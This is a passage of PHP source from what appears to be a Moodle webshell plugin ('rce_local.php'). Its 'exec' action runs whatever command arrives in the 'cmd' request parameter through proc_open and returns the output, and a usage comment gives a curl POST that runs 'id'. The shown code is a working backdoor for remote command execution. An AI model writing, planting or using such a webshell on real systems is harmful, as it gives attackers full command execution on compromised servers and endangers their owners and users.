"Path " . $path_to_file . " does not exist or is not readable.", "path" => $path_to_file]);
}
} else if($action == "exec"){
/*
* USAGE:
* curl -X POST 'http://127.0.0.1/local/moodle_webshell/rce_local.php' --data "action=exec&cmd=id"
*/
$command = $_REQUEST["cmd"];
$descriptorspec = array(
0 => array("pipe", "w"), // stdout is a pipe that the child will write to
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
chdir("/");
$process = proc_open($command, $descriptorspec, $pipes);
if(!is_resource($process)){
exit(1);
}
$stdout = ""; $buffer = "";
do {
$buffer = fread($pipes[1], $chunk_size);
$stdout = $stdout . $buffer;
} while ((!feof($pipes[1])) && (strlen($buffer) != 0));
$stderr = ""; $buffer = "";
do {
$buffer = fread($pipes[2], $chunk_size);
$stderr = $stderr . $buffer;
} while ((!feof($pipes[2])) && (strlen($buffer) != 0));
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
echo iconv('UTF-8', 'UTF-8', addcslashes("[command]\n~$ ".$command."[response]\n".(empty($stdout) ? $stderr : $stdout), "\r\t\\'\0"));
}
?>